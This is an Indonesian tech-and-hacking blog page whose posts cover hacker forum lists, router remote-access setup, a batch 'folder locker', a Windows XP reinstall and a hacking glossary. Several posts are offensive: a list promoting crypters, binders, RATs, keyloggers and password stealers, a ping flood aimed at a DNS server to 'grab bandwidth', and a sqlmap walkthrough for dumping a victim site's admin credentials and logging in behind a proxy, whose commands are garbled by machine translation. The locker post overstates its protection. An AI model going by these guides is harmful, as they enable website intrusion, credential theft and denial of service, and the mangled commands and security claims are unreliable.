This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Daftar Forum Hacker Cracker Dalam dan Luar negri


loading...

  1. www.binushacker.net
  2. www.yogyacarderlink.web.id
  3. www.nyit-nyit.net
  4. www.indonesianhacker.or.id
  5. www.muslimhacker.net
  6. www.sekuritionline.net
  7.  www.jasakom.com
  8. www.echo.or.id
  9. www.kecoak.org
  10. www.devilzc0de.org
  11. www.spyrozone.net
  12. www.exploit-id.com
  13. www.surabayahackerlink.org
  14. www.xcode.or.id
  15. www.hacker-newbie.org

Yang dibawah ini dari luar negri. (Yang kagak ngerti bahasa inggris kaya' saya mending ke forum lokal aja)
  1. www.packetstormsecurity.org
  2. www.phrack.org
  3. www.blackhat.com
  4. www.hackforums.net
  5. www.hackinthebox.org
  6. www.securityxploded.com
  7. www.hackaday.com
  8. www.darknet.org.uk
  9. www.securiteam.com
  10. www.seclist.org
  11. www.metasploit.com
  12. www.backtrack-linux.org
  13. www.secmaniac.com
  14. www.irongeek.com
  15. www.hak5.org
Sebenernya masih banyak lagi yang lainnya, cuman ya cukup sampai situ aja ya listnya. Yang lain bisa dicari sendiri referensinya  di Uncle GOOGLE.
Semoga bermanfaat, selamat menimba ilmu..
loading...

Read More

Setting Modem Speedy untuk CCTV Online

Seting  Modemnya menggunakan contoh modem tplink sesuai standart dari telkom
  1. Masukkan ke modem biasanya pakai ip address default 192.168.1.1 user/password  default admin.


Masuk ke Advanced setup, NAT,  virtual Server  maka akan tertampil seperti gambar  di bawah :


Settingan di atas gunanya adalah meneruskan ip public ( dalam hal ini ip modem) ke ip local ( DVR) . Dalam contoh diatas ip public bisa dilihat 180.252.120.98 dan ip local 192.168.1.223.
Ip public bisa dilihat juga di whatismyip.com

Jadi rule 1 masukkan web port dvr dan ip address dvr jangan lupa save
Rule 2 massukan mobile port dvr ( 15961) dan ip address dvr. Jangan lupa untuk di save

Apabila sudah selesai bila kita ketikkan di browser 180.252.120.98:88 maka akan masuk ke DVR
Atau dengan cara lain arviocctv.dyndns.org:88  maka akan masuk ke DVR karena kita sudah daftarkan ip public dengan domain arviocctv.dyndns.org

Read More

SETTING SERVER / ADSL ROUTER SPEEDY JARAK JAUH

Ada beberapa tujuan mungkin, tapi yang jelas untuk mempermudah setting modem ADSL /router yang menggunakan jaringan speedy yang berada jauh dari tempat kita sekarang, misalnya di warnet yang jaraknya gak bisa ditempuh dengan jalan kaki (bagi yang malas). Apalagi tengah malam, hiiii…..bisa-bisa ketemu kuntilanak kalau mesti melewati kuburan dulu……Nah daripada mesti bangunin pas ustadz buat nemenin, mending kita zikir aza sendiri lalu pergi…..atau kalo malas juga mending hidupin komputer pasang modem dial-up misalnya telkomnet flexi unlimited lalu ketik alamat modem kita misalnya akulagimalas.mine.nu

HAH? HOW WE CAN DO THIS?

Kalo tertarik silakan dilanjut, kalo enggak silakan bobo aja lagi
1. Pertama-tama pergi dulu ke komputer server di warnet. Ingat perginya siang-siang aja.. kalo malam entar masuk angin….mual-mual …..bunting lo! He..he….gak masuknya masuk angin beneran

2. Daftarkan dan temukan ip modem/router kita di internet. Wah bayar gak?
BAYAR! tapi cuma bayar listrik dan sedikit biaya untuk ngisi bensin buat pergi ke komputer server yang jauh dimato dekat di hati, sisanya buat bayarin gue yang udah ngasi contoh ini, wkwkwkwwk becanda boss….

3. Buka firefox/opera atau apa aja yang bisa dipake buat browsing, browser buatan sendiri pakai visual basic juga bisa. ketikan http://whatismyipaddress.com/ dan injak tombol enter (kalo tangan anda kepake buat megang yang lain)

4 Nah keluar tuh IP address punya kita, coba masukan ip yang kita dapatkan di addressnya browser  dan tempeleng tombol enter biar yakin kalo tombol yang terlalu besar ini udah ketekan. HUAHAHAHAHA keluar setting modem/router punya kita, masukan username dan password punya kita. Jangan masukan nomor BH atau Celana dalam sebagai password.

5. Ubah tipe koneksi PPPoE/PPPoA (yang pake username dan password) menjadi bridge (tanpa username dan password) dan sentuh tombol save (kali ini sangat tidak disarankan menendang tombol save) seperti yang kita perlakukan terhadap tombol enter, ingatlah layar komputer anda mungkin akan meledak dan anda akan masuk koran dengan judul seorang admin warnet pingsan tujuh hari tujuh malam setelah melakukan pelecehan terhadap monitor komputer.

6 Masuk contol panel eh control panel lalu network connection dan buat sebuah wan miniport, masukan username dan password speedy anda. Selanjutnya tekan connect.

7. Ping dari command prompt dan ketikan ipconfig /all, maka anda akan melihat dua ip address yait Local (private ip) dan IP dari Speedy (public IP)

8. Sekarang kita harus secepatnya mendaftarkan ip kita ke server dns sebelum ip kita berubah lagi karena ip speedy yang kita pake sekarang dinamis dan tidak statis tapi ganteng kaya saya….wkwkwkwkkwkwk..

9. Sekarang masuk ke https://www.dyndns.com/account/create.html, buat account anda dan lakukan aktivasi account, setelah aktif login ke http://www.dyndns.com dan buatlah host service (Add Host Services) dan tambahkan DNS statis (Add Dynamic DNS)

10. Isikan pada host name nama/alamat modem/adsl yang anda inginkan misalnya akulagimalas.mine.nu dan ip yang telah anda dapat dari http://whatismyipaddress.com/

11. Setelah anda add to chart atau checkout dan aktivasi (mudah kalau diumpamakan dengan installasi program cukup klik next saja atau forward saja)

12. Ketik alamat akulagimalas.mine.nu di browser (firefox/opera dll) dan lihat anda akan masuk ke halaman login modem/router anda

13 Download program DynUpSetup.exe dari situs tempat kita mendaftarkan akulagimalas.mine.nu tadi dan install dikomputer server punya anda,  jangan dikomputer saya ta siram pake air es. Program ini akan secara otomatis mengupdate perubahan ip modem/router kita sehingga kita akan terus bisa mengakses modem/router kita dari jarak jauh walaupun sekarang kita sedang liburan, atau pun bulan madu.

14. Misalkan kita tidak menggunakan/mematikan program dynupsetup.exe tadi maka anda pasti akan gagal login pada suatu saat nanti karena ip modem/router kita selalu berubah rubah. Terima kasih pada dynupsetup yang memudahkan hidup kita.

15. Sekian dan semoga bermanfaat, terima kasih

Read More

Cara Membuat file folder dengan Password

Hampir semua orang di jaman sekarang telah memakai komputer untuk kebutuhan sehari - hari, baik itu untuk kebutuhan pekerjaan maupun tidak. nah biasanya untuk pemakaian pribadi kita mempunyai data - data yang bersifat privasi atau kita tidak ingin sembarang orang untuk melihatnya. Kita dapat Menyembunyikan file serta folder dengan berbagai cara, misalnya dengan memanfaatkan fitur bawaan Windows yaitu Hidden Folder, namun tentu saja ini kurang cukup karena akan sangat mudah bagi orang lain untuk dapat melihat folder yang disembunyikan dengan cara tersebut. lain lagi dengan bantuan suatu aplikasi seperti Folder Lock, dll dimana kita dapat menge-set sebuah password untuk memprotect data - data kita. ini cukup aman namun aplikasi ini biasanya berbayar.
cara menyembunyikan file dan folder
ilustrasi
disini, saya akan memberikan Tutorial bagaimana membuat suatu aplikasi locker atau file hidden dengan hanya menggunakan notepad dan tentunya gratis. caranya cukup mudah, anda hanya perlu memperhatikan langkah - langkah berikut dengan seksama.

Langkah - langkah :

Langkah yang pertama, buka aplikasi notepad pada komputer atau laptop anda. caranya Klik Start >> All Programs >> Accesoriess >> Notepad. atau dengan Klik Start, Tulis Notepad.exe lalu tekan enter.

Setelah terbuka, Copy dan paste-kan Code dibawah ini kedalam notepad kosong tadi.
cls@ECHO OFF
title Simple Folder Locker by MyRepairSolution
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Anda yakin ingin mengunci dan menyembunyikan folder "LOCKER" ? (Ya / Tidak)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==Ya goto LOCK
if %cho%==ya goto LOCK
if %cho%==y goto LOCK
if %cho%==tidak goto END
if %cho%==Tidak goto LOCK
if %cho%==n goto END
if %cho%==N goto LOCK
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Masukkan password untuk membuka folder "LOCKER" ( case sensitive )
set/p "pass=>"
if NOT %pass%== MASUKAN PASSWORD ANDA DISINI goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Jangan lupa untuk mengganti password yang ingin anda setting pada code tersebut. setelah itu silahkan save notepad tersebut dengan pengaturan sebagai berikut :

  • Tekan CTRL + S ( save )
  • Ganti Save as Type menjadi All Files ( *.* )
  • Ganti Filename dengan nama yang anda inginkan namun akhiri dengan ekstensi .bat. ( contoh : Simple Folder Locker.bat )
  • Klik  Save
save dokumen folder locker
save dengan .bat
sekarang coba lihat di tempat dimana anda menyimpan file tadi. anda akan menemukan sebuah file yang tidak mempunyai icon. silahkan dibuka, maka selanjutnya akan muncul tampilan kotak hitam dan indikator menunjukan untuk mengisi Password. coba isi dengan password yang telah anda buat sebelumnya.

sekarang coba anda lihat, akan muncul sebuah folder baru yang bernama  Locker. nah Di dalam folder inilah anda dapat menyimpan file berupa dokumen, lagu, video yang ingin anda sembunyikan. dijamin orang - orang tidak akan bisa mengatahuinya. cukup mudahkan ? 
lalu bagaimana cara untuk mengunci folder ini lagi ?, sekarang setelah anda selesai memasukan data yang ingin anda sembunyikan, jalankan kembali file .bat yang telah kita buat. sekarang di layar hitam tersebut ada pertanyaan "apakah anda ingin mengunci folder tersebut ?". lalu cukup anda ketik "Ya" ( tanpa tanda petik ) lalu tekan enter. dan Voilaa !! folder tersebut pun akan segera hilang. 
bagaimana, cukup mudah kan ? tidak perlu merogoh kocek untuk membeli aplikasi locker diluar atau menunggu download secara bajakan. cukup dengan code line yang singkat anda sudah berhasil membuat Aplikasi File dan Folder Hidden.
namun terkadang muncul pertanyaan berikut :
"Apakah ketika file .bat terhapus, seluruh data yang ada di dalam folder LOCKER juga akan terhapus ?"

jawabannya adalah :
"Tidak, jika file .bat terhapus, anda dapat membuat sebuah file baru dengan cara yang sama dan diletakan atau disimpan ditempat yang sama dengan file yang terhapus tadi. pastikan juga code line tidak berubah, maka folder locker akan bisa di akses kembali."

Read More

Install Ulang Windows XP Tanpa Format

install-xp



Pernahkah anda menginstall ulang windows tanpa harus melakukan format hard disk (tanpa me-repair) dan tanpa harus menginstall ulang kembali driver dan aplikasi yang sudah ada ? Jika belum silahkan lanjut untuk membaca artikel ini.

Menginstal ulang Komputer merupakan pekerjaan yang cukup membosankan dan menyita waktu kita. Karena setelah menginstall OS windowsnya kita harus menginstall kembali semua driver, semua aplikasi dan juga harus menyelamatkan datanya terlebih dahulu, serta mensetting kembali windows.


Penasaran dengan cara ini? Berikut Langkah-langkahnya :

1. Masukkan Master CD Instalasi Windows kedalam CD ROM

2. Melalui RUN, Cari lokasi file “winnt32” yang berada didalam folder i386 di CD Instalasi. Jika sudah ketemu, klik Open

install-xp-01

3. Kemudian tambahkan baris perintah dibelakangnya, sehingga perintahnya menjadi seperti dibawah ini (asumsi CD Drive anda pada drive G :
G:\I386\winnt32 /unattend
install-xp-02
lalu tekan enter atau OK.

4. Secara otomatis Windows langsung menampilkan layar proses, kemudian akan merestart sendiri Komputer anda.

5. Biarkan saja proses berlangsung hingga selesai. Anda tidak akan perlu repot lagi untuk menginstall driver dan aplikasi.

Selamat Mencoba :)
(data di D atau diluar system gak bakalan hilang)

Read More

Applikasi Hacking

Batch 
- DELmE's Batch Virus Generator v 2.0
- Power Of Batch [Text File]

Crypters 
- Bifrost Crypter by ArexX 2
- Cryptable Seduction 1.0 by DizzY
- Crypter by Permabatt
- Crypter bY YoDa
- Cryptic 1.5
- Daemon Crypt 2 Public
- Deception 4 by [RaGe] [Favorite :D]
- Destructor Crypter
- EXECrypt 1 M0d by CARDX
- Fuzz Buzz 1.2 by BulletProof
- OSC-Crypter by haZl0oh M0d
- Poison Ivy Crypt M0d by CARDX
- SaW V1 Mod by LEGIONPR
- Skorpien007 Crypter 3.1
- Stonedinfect Crypter 1.0
- Trojka Crypter 1.1 by tr1p0d

Binders 
- Bl0b B!nder 0.2.0 + USG
- BlackHole Binder
- F.B.I. Binder
- Predator 1.6
- PureBiND3R by d3will
- Schniedelwutz Binder 1.0
- Simple Binder by Stonedinfect
- sp1r1tus Binder 1.0
- Tool-Store Binder 1.0
- Tool-Store Toasty Binder 1.0
- Yet Another Binder 2.0
- Others

Crypters 
- Bifrost Crypter by ArexX 2
- Cryptable Seduction 1.0 by DizzY
- Crypter by Permabatt
- Crypter bY YoDa
- Cryptic 1.5
- Daemon Crypt 2 Public
- Deception 4 by [RaGe] [Favorite :D]
- Destructor Crypter
- EXECrypt 1 M0d by CARDX
- Fuzz Buzz 1.2 by BulletProof
- OSC-Crypter by haZl0oh M0d
- Poison Ivy Crypt M0d by CARDX
- SaW V1 Mod by LEGIONPR
- Skorpien007 Crypter 3.1
- Stonedinfect Crypter 1.0
- Trojka Crypter 1.1 by tr1p0d

Keyloggers
- Ardamax 2.8
- Ardamax 2.41
-Micro Keylogger
-Family Keylogger

Sniffers 
- Cain & Abel Self Installer [WinXP]
- WireShark Self-Installer [Win32]

Nukers dan Fl00ders
- Ass4ult
- B4ttl3 P0ng
- Click v2.2
- Fortune
- ICMP Fl00d
- Panther Mode 1 & 2
- Rocket v1.0
- RPC Nuke

Port & IP Scanners 
- Advanced IP Scanner
- Advanced Port Scanner
- Bitching Threads
- BluePortScan
- LanSpy
- NeoTracePro
- NetScanTools
- ProPort
- Putty v0.6
- SuperScan
- Trojan Hunter 15
- ZenMap - Nmap v5.21 [Win]

Stealers 
- 1337 SteamACC Stealer Private
- Allround Stealer
- Armageddon Stealer 1.0 by Krusty
- bl0b Recovery 1.0
- Blade Stealer 1.0 PUBLIC
- Codesoft PW Stealer 0.35
- Codesoft PW Stealer 0.50
- Dark Screen Stealer 2
- Dimension Stealer 2 by Gumball
- FileZilla Stealer 1.0 PUBLIC
- FileZilla Stealer by Stonedinfect
- Firefox Password Stealer - Steamcafe
- Fly Stealer 0.1
- Fudsonly Stealer 0.1
- Hackbase Steam Phisher 1.2 BETA
- spam 0.0.1.4
- spam Stealer
- HardCore Soft 0.0.0.1
- ICQ Steal0r
- IStealer 4.0
- IStealer 6.0 Legends
- LabStealer by Xash
- Multi Password Stealer 1.6
- Papst Steale.NET
- Pass Stealer 3.0
- Pesca Stealer 0.2
- pixel Stealer 1.3.0 SC
- pixel Stealer 1.4.0
- ProStealer
- Public Firefox 3 Stealer
- Pure-Steam 1.0 CS
- Pw Stealer by Killer110
- PWStealer 2.0
- Remote Penetration 2.2
- SC LiteStealer 1
- SimpleStealer 2.1
- SPS Stealer
- SStealer by till7
- Steam Stealer 1.0 by ghstoy
- Steam Stealer by till7
- Stupid Stealer 6 mit PHP Logger
- System Stealer 2
- The Simpsons Stealer 0.2
- Tool-Store FileZilla Stealer 1.0
- Ultimate Stealer 1.0
- Universal1337 - The Account Stealer
- Universal1337 2
- Universal1337 3

Vulnerability Scanner and Exploiter 
- Atk ToolKit 4.1 [Src Code Included]
- Metasploit Framework V3.4.0 [Win]
- Nessus [Win32]

R.A.T.s 
- Apocalypse 1.4.4
- Aryan v0.5
- Bandook RAT 1.35
- Bifrost 1.2.1d
- Cerberus 1.03.4
- All Cybergates from v1.01.8 to v1.04.8
- DarkComet 2 RC3
- Lost Door 4.0 Pro
- MeTuS-Delphi-2.8
- Nuclear RAT 2.1.0
- Optix v1.33
- Poison Ivy 2.3.2
- ProRat 1.9 SE
- SharK 3
- Spy-Net v2.6
- SubSeven 2.3
- Turkojan 4 Gold

Others
- Bruteforcers
- Extra! [From VIP Vince Tool pack]
- ProxyBrowser
- Various Tools

Website Exploit And SLQ Injections
- Admin Finder
- CGI-Bug Scanner
- Exploit Scanner
- ServerAttack
- SQL Helper
- Dork List [Text File]
- Dork [Text File]
- Master Google Hack List [Text File]

Demikianlah Applikasi yang sering digunakan oleh para hacker,mungkin anda dapat mencoba-cobanya.tapi ingat jangan sampai merugikan orang lain.
Semoga Bermanfaat

Read More

Daftar Istilah Kata di Dunia Hacking

1). Bug
Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.

2). Patch
Perbaikan terhadap bug dengan mengupdate sistem yang memiliki vurnerable system.

3). Vurnerable
Sistem yang memiliki bug sehingga rentan terhadap serangan.

4). RFI
Penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load.

5). LFI
Suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan) ke page yang vulnerable ( Vulnerable LFI maksudnya ).

6). SQL Injection
Salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server.

7). DDoS
Membuat suatu sistem crash & karena overload sehingga tidak bisa diakses atau mematikan service.

8). Shell
Inti dari sistem operasi. Shell dapat digunakan untuk mengendalikan kerja sistem operasinya.

9). Deface
Merubah tampilan halman suatu website secara paksa dan illegal.

10). Debug
Kegiatan mencari bug pada aplikasi dan memperbaiki bug yang ditemukan.

11). XSS
Adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client.

12). Phising
Adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

13). Keylogger
Adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)

14). Fake Login
Halaman tiruan/palsu yang dibuat untuk mengelabui user, bertujuan untuk mencuri informasi penting dari user (eg. username, password, email). Seperti pada kasus pencurian email n password Friendster, Facebook, dll.

15). Fake Process
Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem.
Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax", proses "./backdoor" berubah menjadi "usr/sbin/httpd".

16). Malicious Code/Script
Kode yang dibuat untuk tujuan jahat atau biasa disebut kode jahat.

17). Virus
Kode jahat yang sistim kerjanya seperti virus pada manusia, menggandakan diri dan seperti parasit menopang pada file yang diinfeksinya. File yang terinfeksi menjadi rusak atau ukurannya bertambah. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yang memeriksa crc32 dari dirinya.

18). Worm
Kode jahat yang sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.

19). Trojan
Kode jahat yang sistim kerjanya seperti kuda trojan pada zaman kerajaan Romawi, masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian mengirimnya kepada pemilik trojan.

20). Backdoor
Pintu belakang untuk masuk ke sistem yang telah brhasil di exploitasi oleh attacker. Bertujuan untuk jalan masuk lagi ke sistem korban sewaktu-waktu.

Sebetulnya istilah-istilah dalam dunia hacking itu banyak, tapi hanya 20 point saja yang saya tulis disini, dan untuk istilah hacking lainnya, sobat bisa cari digoogle.

Read More

Cara mengambil bandwith internet dengan menggunakan CMD

loading...

1. kalian buka RUN, caranya dengan memencet (gambar bendera windows+R)

2. ketik CMD
3. akan keluar seperti dibawah ini (setiap komputer bisa berbeda)


4. ketik ipconfig /all
5. akan keluar tampilan seperti dibawah, carilah alamat DNS server kalian
6. lalu kembali lagi kebawah ketik ping -l 500 <DNS> -t (ingat gunakan spasi agar sesuai)
7. enter.. dan akan keluar perintah seperti dibawah.. lalu minimize cmd kalian
8. kalau sudah selesai tinggal close CMD
9. value 500 bisa diganti 1000, 2000 dst.. tergantung kuat bandwith

loading...

sekali lagi INGAT!
PENGGUNAAN CARA INI ADALAH SEPENUHNYA TANGGUNG JAWAB KALIAN.

terima kasih, semoga infonya berguna

Read More

Cara Hack Website Terbaru Dengan BACKTRACK 5


1. Buka terminal mundur dan jenis cd / pentest / database / sqlmap dan tekan enter. Sekarang sqlmap terbuka di terminal Anda 
[sql-map-13.png]
2. Sekarang menemukan situs rentan. (Baik saya sudah memiliki situs rentan)
[sql-map-2-3.png]
3. Sekarang ketik perintah ini di terminal dan tekan enter. (Lihat di atas gambar)
python sqlmap.py-u http://yourvictim 'menyelinap / index.php id =? 4 -dbs
4. Sekarang Anda akan mendapatkan nama database website
sql map 3
Yah aku punya dua database aj dan information_schema kita akan memilih database aj.

5. Sekarang mendapatkan tabel database tersebut. untuk itu Anda perlu memasukkan perintah ini ke terminal Anda dan hanya tekan Enter.
python sqlmap.py-u slink / index.php http://yourvictim '? id = 4 -D (nama database)-tabel

6. Sekarang kita perlu untuk mengambil tabel dari database aj. paste perintah bawah perintah dan tekan enter.
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id =? 4 -D aj-tabel
sql map 4
7. Sekarang Anda akan mendapatkan daftar tabel yang disimpan dalam database aja
sql map 5
8. Sekarang mari kita ambil kolom dari tabel admin
python sqlmap.py-u http://www.yourvictim 'slink.com / index.php id = 4? -T admin - kolom
Sekarang kita punya kolom dan kami mendapat username dan password

9. Sekarang mari kita ambil password admin
python sqlmap.py-u ? slink.com / index.php http://www.yourvictim 'id = 4 -T admin-U test - dump
Sekarang kita punya username dan password dari website!
sql map 9
Sekarang hanya menemukan admin pidana website dan menggunakan proxy / vpn ketika Anda mencoba untuk login di website sebagai admin

Read More

Belajar DOS

Microsoft DOS atau lebih dikenal dengan MS Dos dibekali dengan beberapa hacking tool tersembunyi yang akan kita jabarkan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini kita akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP

Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.
1. ping
2. tracert
3. telnet
4. ftp
5. netstat
dibawah ini adalah cara penggunaannya

1. ping

Utiliy ini digunakan untuk mencari keberadaan remote host. Yang mengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.

Cobalah anda ketik perintah ini:

C:\windows>ping/?

*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.



Jadi kita dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka kita mendapatkan.


Pinging chintan [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms ttl="128">
Reply from 127.0.0.1: bytes=32 time<10ms ttl="128">
Reply from 127.0.0.1: bytes=32 time<10ms ttl="128">
Reply from 127.0.0.1: bytes=32 time<10ms ttl="128">

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

************
Newbie tip: 'localhost' adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.
***********

Hal ini menunjukkan kepada kita  bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik “ping www.yahoo.com”

Pinging www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:

Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54

Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms



Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.

Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.

***********
Newbie tip: 'Dos' yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.

2. Tracert

Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote machine. Sebagai contoh, jika saya mengetik “tracert http://www.yahoo.com/” pada dos prompt maka akan terdapat:

Tracing route to www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:

1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]

Trace complete.

Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama saya melalui sify.net (nama ISP server saya) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun anda membuka http://www.yahoo.com/ dalam web browser, request anda selalu melalui isp dulu (untuk mendapatkan ip dari http://www.yahoo.com/ dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo.

Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan nmap dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall. Mengenai masalah firewall akan kita bahas dalam artikel tersendiri.


3. Telnet

Jika anda menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi anda. Sebenarnya merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet anda dapat menentukan suatu koneksi antara mesin anda dan remote machine melalui port tertentu.


***********
Newbie tip: Disini saya membicarakan tentang virtual port. Tidak secara fisik yang anda lihat dibalik CPU anda. Hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual port.
***********
Jika anda mengentik “telnet target.com” maka anda terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Anda juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika saya ingin terhubung ke port no. 25 (SMTP service) maka salya akan mengetik “telnet target.com 25”.
***********
Newbie tip: Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services" pada notepad.
***********
